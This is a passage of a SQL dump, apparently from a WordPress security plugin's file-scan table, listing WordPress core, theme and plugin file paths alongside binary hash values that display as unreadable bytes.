�Ʃ��P���','',0,'?'),('�-h\n\r`��ýەC/s','wp-includes/class-wp-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'\'\'��UQ�|4��','F�7��������S�1�\Z�`#�4�\rHsL\n','',0,'?'),('�r��-����D.�\\�','wp-content/themes/twentytwenty/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7H7��g��t~��Ǿ^','���^��Q��EQ�>���[�!��Be&z��','',0,'?'),('�%N�^ǽv�7s�@\n�5','wp-content/themes/twentytwentyone/assets/css/ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_{�m��<R�zx��','�4R���]�,}�\0���m��E�:��!�','',0,'?'),('�\'���X���1@}�o','wp-content/themes/skt-toothy/images/icon-in.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n��antX�\"A�','�J��z3����p�s�1\'��Οެ�O���~','',0,'?'),('�,(�i7:^�^�#','wp-includes/js/tinymce/plugins/paste/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dX�������z҆֫','�f��\0W{?q��������Ul�P�֫c8','',0,'?'),('�>��[�ұE�D�;�','wp-includes/block-patterns/three-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ǟ�( aL�)�m','\r��)��k���O�dS0�X�z���_����','',0,'?'),('�?���Ml����?�i','wp-content/themes/regina-lite/layout/css/bxslider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^]mH����D�u�-�','H�[�DR����(b��O\n�<��\r����','',0,'?'),('�J��^\Z7��uG�k+','wp-content/plugins/wordfence/lib/wfDB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�_<���-1�__I��u','�%d����d��_�\01@TY�$����A','',0,'?'),('�M��{0:�\0L���4','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-login-fails.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����N�?Jk����','Q=\0oW�o9�7i�d�@S\Z=�ל�5�%h�T','',0,'?'),('�d��%3��Z�4��_+','wp-includes/css/dist/edit-post/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{J����3=�f�','w��ko����xv&Aޭ�� T�gޗ���','',0,'?'),('�k��/y�����&��G','wp-includes/images/rss-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ya[�Q���rj�','yS0�c`\n7��as��#�n��Y���','',0,'?'),('�l;ao��~�G��','wp-includes/Requests/Exception/HTTP/501.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eڸ04�-?��ב�5','�k�G寲�\nCD#�6�u\Z�քEڣ@K1','',0,'?'),('ق���)�4�g����0h','wp-content/themes/twentynineteen/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�oG;� k�\Z\"�','��ՙda��1,6����9�%ef;V�5+�','',0,'?'),('و�TĖhx~Dt>l�','wp-includes/js/dist/compose.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R6�\\J��\"5r���','h��l�2������<��_9��x����C�ҏ','',0,'?'),('٘�\"P�ܞ��,���','wp-content/plugins/wordfence/images/icons/ajax24.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����mP�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('پ[��v�J_.�G�','wp-content/themes/twentytwentyone/assets/js/palette-colorpicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-���|��e,��','#���&=!����ȝp�x�ǻ�\\7��2�y','',0,'?'),('ٿi����a���3GLj','wp-content/themes/healthcare/js/jquery.prettyPhoto.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r\n�B�!�gt�q�','\'�!���F8�/�)�N���,n\"�\"�����m','',0,'?'),('��{��]]��R�\n]','wp-content/plugins/wp-cerber/assets/flags/md.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z6>�x��D�\ZL/x\n','���[Ρj*�Z�\'��ӛ�U!Wa�����\\','',0,'?'),('��3��I�98\\�֛�[t','wp-includes/random_compat/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�RX�Ǡ�ͤB�n6','8�-%���s�`N��a�L �L�M�ʫ�)�','',0,'?'),('��!}�=�`*�gZ=','wp-admin/network/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ь�ԥ�d�o|��ܪ','��%�v\0���\r����:c��GO���','',0,'?'),('�VBǡ��\Z�B\"\0��','wp-includes/js/codemirror/esprima.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d_� �S��g��ٛ��',']�;�%Js��lx��Fq��BH\Z�U8��','',0,'?'),('�>�~�!�g�q��','wp-includes/js/tinymce/skins/lightgray/skin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��B���&�pw�','7>xV&v|��U�& ݷ\"ǥz9j�F%ѽK��V','',0,'?'),('�\r��Be�ׯE�7','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y}���`8v�FJ','�U��߆(�[�r嵳��g���h��嬵!m9(\"�','',0,'?'),('���u��xy���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��w�=Ţ�O�&�F�','wp-admin/css/colors/midnight/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&܍���|DW��!E�4','S��o�Gp����{���\"�FuS�&�����','',0,'?'),('����DW��в;�.','wp-content/themes/doctors/core/contents/loop_404/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �k>�]�T8��G�6(','?!2��\r������y*�R*�!9�tVq=�\\','',0,'?'),('�\'��7��b��~ 6','wp-includes/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ң-���с��','�9\0zot�ID:\0����g� I%�~ަ��$o','',0,'?'),('�,\r�� �g�H�6','wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L֍6����\0��W','�\0�6�3^r1�l�9cqY�p�h�Okl�\r�K','',0,'?'),('�2�6,̞|ke�L\ns','wp-content/plugins/wordfence/images/2fa1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/)�h\\ h�G�8�','C�%�0�z)f ����@�t>��ɶ{T��8�o�','',0,'?'),('�2��Ah#�������4','wp-content/themes/skt-toothy/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ż�q��n0�sQ�','�*�o�jВq�\0�+��W�� ͇�.�Lm�','',0,'?'),('�:�P����⚧�P�','wp-content/themes/wp-barrister/library/images/icon-search.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',r��D�(�n��H','v��DN�,&�p>��X5%[�go��x#�Vϓ�TYv','',0,'?'),('�P���)\n,��h$��o','wp-content/themes/regina-lite/layout/js/plugins/lazyload/lazyload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';���� ��З�;�3','��R&1ʪ.Z��/T�k���G�u\Z@��E��x','',0,'?'),('�`V�\\�������9�','wp-content/themes/twentynineteen/template-parts/content/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��Gm��xW���d',' N��ż �I6h�%^�?`v�Y�=��2��','',0,'?'),('�gu���\Z�� `���!','wp-content/themes/doctors/core/customizer/help/_border_color_meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"M�}|�\\�T�J�','��$?q=��}�m�ŝ�%�I�/�����hb;','',0,'?'),('�u78�¸�KԊkh�','wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?\"p6;�oZB?��6��','�}�SjȎwy��`��`��R=�*�ɒ�\"*g','',0,'?'),('�|�#�#�{����','wp-admin/js/link.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"1��6�����','z���;���LRK�`�jݰ�P\'�N�v\'','',0,'?'),('ډx`�9�LťM��,L','wp-includes/css/dist/block-editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�뺆�� �#��y�k~','(���䚆�u$/�/��f��Ш�۬x��M','',0,'?'),('ڰXϨ]I�s�_Z�}��','wp-content/themes/twentytwenty/assets/js/color-calculations.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�0�^�t��}S�','̠U���e�Cb�`aމb���z/ȓ�U','',0,'?'),('��#6�K%#f\r�','wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H0�c;`���W&','2A]�ڛ\\e��WߦkZ�s���c�<�`�d)�','',0,'?'),('��W�S�:�(�=c��','wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gߔ��A���B�\\�','�`GS\"Ŝ(G�u\Z �s�E����P|��','',0,'?'),('���YjT��}4','wp-content/themes/doctors/core/contents/part_sidebar/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ہC1��2���\0�1�','�^`��)6z~����I�~\'O����a�Ӆ/','',0,'?'),('��T!�5�E��?g��','wp-content/themes/regina-lite/inc/libraries/welcome-screen/sections/recommended-actions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��D_�o#��p�|','��h.�*���n�s��rmc~#�#��Â�^','',0,'?'),('�Ѭ�����U�mP`Z�','wp-content/themes/doctors/core/contents/loop_templateAbout/skin1/js.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�鳟�:yc�\nE� V�','wp-content/themes/advance/inc/kirki/assets/js/branding.js',0,'\nj@��>�ئ�r�/��','\nj@��>�ئ�r�/��','�\06z=�a����\\��(���GmTꥪ7SQ','',0,'?'),('��J�B�&9:V�F[�','wp-includes/js/dist/media-utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3)PvLiJO�|��','�c��BD����ҕ���2+��k�`1<��*�w�˕','',0,'?'),('���C�.yj\0o�*�f�','wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S��o��JP�','�ǣ.�ڑ���m���Uǝ��az��l-pv','',0,'?'),('�!�(t��<Թ','wp-includes/js/heartbeat.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r���>������q����','��~�8��|\nvS̃M_ZD�&���K��-\Zې�','',0,'?'),('��_\r�JL�#�@B��','wp-admin/css/colors/midnight/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��|��\'\rȤ�@�\n','B��x.e��DP�0�����$\Z�D3��','',0,'?'),('�ƪ�D��|��\"�3��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('� �I�_X�����?','wp-admin/js/gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z%�[�l�]ʕ����','���I�^�K��_�i��Gz��:5��n|�ߡL','',0,'?'),('�4��6�1�m��Y�R','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nH\0�u�}� `����','���R�&�X��d�[��4���9��V�I','',0,'?'),('�<���\0vY�>ma','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-chat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�=4�+��2]','i\Z%�2���l���@uFi��=��_\0P�հ�','',0,'?'),('�XؘM#���^���x','wp-content/themes/doctors/core/assets/js/theme-base-js.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'e�tï<и5Ae�-','1�~���?^�=��fP�[DQ,�0!�`dƲ','',0,'?'),('�q����Hk����y*','wp-content/themes/doctors/core/contents/part_footer/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X��-��O|�$���','�hؖ�u��#|��J�b��C��is&!�','',0,'?'),('�u�UA{G�o�Λ{�','wp-content/themes/regina-lite/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������S��aZ�',':ڊ8��qA��W�n}�)�϶�h��b��~��`�','',0,'?'),('�v6^A��A/],6\'y:','wp-admin/css/site-health.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~��{�x�y6roc�','ɬ�v��O�܋)%���\0���|М���O�','',0,'?'),('ۈ^�%�m���H�Y','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/img/two-column.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����������}�','\0�%�1C� O�.�GN��qz���c�@Y3%&�','',0,'?'),('ۋ{S0\0\0=�1_ئ\r�5','wp-includes/js/dist/priority-queue.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�9(�����&!�x�','5�r�Q���b�͔5�t����>:js-O','',0,'?'),('ۖJ�Bw�C��|M�v','wp-content/plugins/wordfence/lib/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5VzY�]�#yR��Jݮ','Y�M�\"z)tϖ���*c�wL\0�����1w$d��','',0,'?'),('۪�� .�ո�\\���','wp-includes/js/tinymce/skins/wordpress/wp-content.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����`��Un\0\r��','>���@�:so���X�=��Kd��ku�{�','',0,'?'),('��r�����=�Ԓ�','wp-includes/images/rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�(�.��*NZ�','j�(-9��_��E-#�we�$�]o�01��u','',0,'?'),('�ڨ�t�c �˵�:G�','wp-content/themes/twentytwenty/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y.��|� �zo~��','�m`C/\r���~�����/#b\ZM͆��]�؍i','',0,'?'),('��\np���Gnu:���','wp-includes/js/colorpicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V g�����-�','�V�w��%�%�:�3CQ#+g�� ��e�}�','',0,'?'),('��:�ҝ\Zdm���*v','wp-content/plugins/wp-cerber/assets/flags/ie.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�Ht�`��Mˉ.2*','��H�X�� �\Z�۴�n��\0y��n��n','',0,'?'),('�V�&A�\Zw�$��)[','wp-content/themes/regina-lite/inc/components/author-box/class-mtl-author-box-output.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x���;K: x��k�','vY�]�(��xf�E���8Y�����8','',0,'?'),('�F���\ru�D�b7','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m�E���}8ןb�,','dh��nC���[�$���P7�xH\"8�i\Z*�','',0,'?'),('�ȼ�؟�\'\r`����','wp-includes/feed-rdf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xG�7�%���\0b���','p=m=G�l�h�nh��V��]�-�+�1�a','',0,'?'),('�2G�?�_�\\��-B','wp-includes/canonical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G��o<����ݏ�','����1\r�eɓ�������Y宒^zՒ=�F�1','',0,'?'),('�7�40���!Go �','wp-content/themes/twentynineteen/sass/elements/_elements.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��u����$x\0oT�','�\n�ơ�J��xY#$m>�ۍյ?�U\"$��lz','',0,'?'),('�M\\-D�kf����','wp-content/plugins/wp-cerber/assets/flags/kw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�p8V��$vL\r�Y]�','&�\\m0���Iz{<�>��|���\'����L','',0,'?'),('܅zϞ]�����L�3��','wp-content/themes/wp-barrister/content-chat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�Ƹ7�\'뙛0���','���*�Ń�AIs�����]��7�\n���','',0,'?'),('ܑK�ݓ���%eP�^U','wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&����#i�]�<{','EPmh>*H�S��8�S�F��pXbdU8����','',0,'?'),('ܛT���I���$]���','wp-content/themes/regina-lite/page-templates/sidebar-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[��\0VEU��^��-M','�������St�j�E��,�o����G!�O\r','',0,'?'),('���.�U� ��Y��=','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h���`����V�Af','<�\\�G��;1#��k�L��à��(փ','',0,'?'),('��Tо�R���\'�{','wp-content/plugins/wordfence/lib/wfPersistenceController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��ky���i�MO*','����X(�30\r\n��\nPE�̠�� �9��','',0,'?'),('��ջZml��4�ˮU','wp-includes/images/smilies/simple-smile.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��{
��f�w�h','�?Y�ag\\�<y����0\01��8�3��H�g','',0,'?'),('��\r\0FJ��B��e�','wp-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q�����G1��','[�d�뿪�a��o�Ϸ�8|[��U��u�(','',0,'?'),('�(���K�B��','wp-includes/js/codemirror/fakejshint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�v�,ROlx]J\')K','��-�6�$$�;���}ptO�4]2��ТR�5֡','',0,'?'),('��Ԭg#��٠���','wp-content/themes/twentytwentyone/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��6Z��.�C�A','��-c����W��o��6\n����(','',0,'?'),('�h����!�/vˏ','wp-content/themes/regina-lite/layout/js/plugins.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hŋ\r�{��k�l�\"','����\\�<yJB\03��ӌ��&=�;��;','',0,'?'),('�7�B�J���~}\0','wp-content/themes/advance/content-none.php',0,'��aC���h�lC\0r�','��aC���h�lC\0r�','�ꠤ�D>i����<OTb�ӭ��#�C)i�S�','',0,'?'),('�J0���j�Yg�h�','wp-includes/js/tinymce/plugins/lists/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�8��:s��w�9�J��',')b�#4�e��*�9(��=�QE�e0|1���\n�','',0,'?'),('�[6�5��+� �n9�','wp-admin/images/sort.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������*� ����3','vP���-~�x��O\" �����;��','',0,'?'),('�f��y���ħ�*!','wp-admin/js/nav-menu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B�)=�\'d�G�','d6��H�W�F�8!�y�NA���2��\'`@�','',0,'?'),('�f��=�$�c��<��','wp-content/themes/advance/inc/customizer/config.php',0,'*�K{8���x���/�:�','*�K{8���x���/�:�','C~�H�(k���؆E��a�JU���-�J)�','',0,'?'),('�qR��\\\'�����s\"','wp-content/themes/regina-lite/layout/js/plugins/html5shiv/html5.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a���P�\"�� <X�1�','V�i����3\">l�h~��v0��X�o?�dP','',0,'?'),('ݖ�\'�\"|3�_�t|��','wp-includes/class-wp-term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q5��ׄXZ��','�}Gj)p�����O�7�٠fݒ���ፎ�Y�p','',0,'?'),('ݟ_@�A��jIZ�\"�','wp-content/themes/healing-touch/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZiA���h�<A� �k\"�','�p�2%$4R[��vP�1��Ӹx�Y��8��Q9','',0,'?'),('ݦ����{b�h0�Q�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6ߔu�U�Q(�AF�','̩\ZTQb[c�U�,��s~��$�F_\n�e� �','',0,'?'),('�����\Z4=#��','wp-content/themes/twentytwentyone/.stylelintignore',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':F��Q��K/���(�','�\"����$ْ��Mh�m��6�:W�C�tN��`�','',0,'?'),('��\Z_��Y��sNW�&','wp-content/themes/skt-toothy/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z����ܾ�;�l$','V|S�t��5�<����VI$�Ⱥa�','',0,'?'),('��\'��|?��>��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L��aDJ�?��Z��','����=F=�=�<��_%�=��M?�����u/','',0,'?'),('�OKN�\0�Yn\"��a','wp-content/plugins/akismet/views/connect-jp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s��Q�X���3��','�\0.l>Wv&�������q�v�+��I�N~�W','',0,'?'),('�HC������)�C�','wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��K��\n�u�@�x','Aݶ�݁;_|s�Ȥ4��_�)z�aK�Q�Ee!��','',0,'?'),('��u�m�mL�jsL/�','wp-content/plugins/wp-cerber/cerber-ripe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�a���G�5.L��','�BA�i���B�\rD�y.��_�Ώ%)�X�h�\Z�','',0,'?'),('�p�խ^�@#�Ԓ','wp-content/plugins/wordfence/views/scanner/scan-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�1{� @�m�90','�K��M$���)�+SCQF�1qZ�Tv`�r','',0,'?'),('�3^��PM�Y���H�D�','wp-includes/js/tinymce/skins/wordpress/images/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�¶��B�=\rz��3j�','���i���I/=�M�MX�:M�A�pv�\r�','',0,'?'),('�5f�����oޮ�','wp-admin/includes/class-wp-privacy-policy-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ã��6�rRӆ��',':����֎�,J-1�3��B\ZU.��g','',0,'?'),('�N�\\�|�`*�,)@4','wp-includes/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('�a�c]OVT�;� (K','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-blacklist-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nb�[�c�^��2}/��','��g\r�^� �j��L��v2���\Z���x�t','',0,'?'),('ރ��n�;�u!���:','wp-content/themes/wp-barrister/library/images/icon-fb.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���D*���ÿ�?','�d��T}�|��p�u�w�d~�.�_W�TQ','',0,'?'),('ޒ�?I�Ωi%��g�y�','wp-content/plugins/wordfence/lib/menu_dashboard_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�h<x�Ο�=9��','�����Q�zE���\'?H)ky��a\Z�>Bч�','',0,'?'),('ޠ�OČÑL:\0و�','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӂ��\"�E47ŎE�','�����yaĊ��2ݦ�wʩ��q�,���{','',0,'?'),('ޭ�X���5t�i�۾','wp-content/themes/doctors/core/home/blocks/blog_grid/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���o�\0�����\n','Q<4P�F� ��#ұf\"<��7�y��)��o6�','',0,'?'),('��H�C�$���!�P','wp-content/themes/regina-lite/layout/images/team/team-member-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YOt\n�isJK���,','�,M���\'�)H,Ue3�w���N�I�Ǫa�','',0,'?'),('�ދ���1F���a�','wp-content/plugins/wordfence/lib/wfArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'Fbaۆ�ₑ�1ʤ/','��n2q��8D��-�AR�>�xqYq���$� ш','',0,'?'),('��\'g!�:�H��),�','wp-includes/SimplePie/XML/Declaration/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O,@�ۺ�a� Δ��','��im�Q�q+��\r��:�Po����\Z*�����','',0,'?'),('���\"�����c)j�\"','wp-includes/js/wplink.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`��̶�Vu��m��','Ե*&n�����_��f\nz\r*���3I�I;C�','',0,'?'),('�/��i�Zج �[?�*�','wp-content/plugins/wp-cerber/assets/multi/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u���E.0�Ȁ��b[�','�]=2�����F���(Cҷ\Zc�93Є�K@','',0,'?'),('�=@\\�JpQ�m\\��6','wp-admin/includes/class-wp-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M$=�8�:����Az�n','%L���ð�@C�Ub��t�����n���c\Z�d','',0,'?'),('�L#�����a���W �','wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���DBSq&a��_�%','�2��C���Zh+�̴���\'�H��p�H�r','',0,'?'),('�bz�/���T�7aHy','wp-includes/js/mediaelement/mejs-controls.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^yq+�S%��y','������h���A3L�:��\'1�ꁠ�\\�','',0,'?'),('�q����%ű� m+','wp-admin/css/colors/light/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b\07Α�L��b�HgO�','5���m���%!��au�l�qRk{qn�ia�0','',0,'?'),('�r�±�2�\"}� �,�7','wp-content/plugins/wp-cerber/assets/flags/nl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��+Z59����)|','/��\ns��!�-���?k���>��yU� �','',0,'?'),('ߌ��(������2���','wp-includes/js/quicktags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �w.PX�Mɇs�K!','_1��T��)��U�k�`{��,�;�k��o�','',0,'?'),('ߐ8N��DPhr4��}�','wp-content/themes/regina-lite/inc/libraries/welcome-screen/sections/recommended-plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��a�G�NAl*ؒ�','<H�1e\r>�Ŧ�2����s;��,��`���O�','',0,'?'),('ߔ������H�u�&�','wp-includes/js/plupload/plupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݠ�$pZR�>\'�|�','�\"����8[J%�.�˚�c�V\r\rE��)\'','',0,'?'),('ߗ�Q��u�!ٶx�[','wp-includes/js/wpdialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=nR�-��KP��=��<','w���ڇEÞ����\0�v�ӭ��k^�M�n','',0,'?'),('߮`���F/�u���','wp-content/themes/regina-lite/inc/components/nav-walker/class-mtl-extended-menu-walker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@]k�/&�AVwkw#','ǚC�|܋��d�bv_�I��ݫ�/h�,�1S','',0,'?'),('߰S����h[�۳�','wp-includes/class-wp-http-streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oo�֪$N�~�F0�ۂ','��d� *ȩ�X���J�z9<��)�>�ԃtj','',0,'?'),('ߴ�S8��AТ','wp-includes/js/jquery/ui/autocomplete.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':dL�*�E�&*!','��`��Or\r�8;P[Q�=�;����ܣj','',0,'?'),('߹V�=���\"�#n� 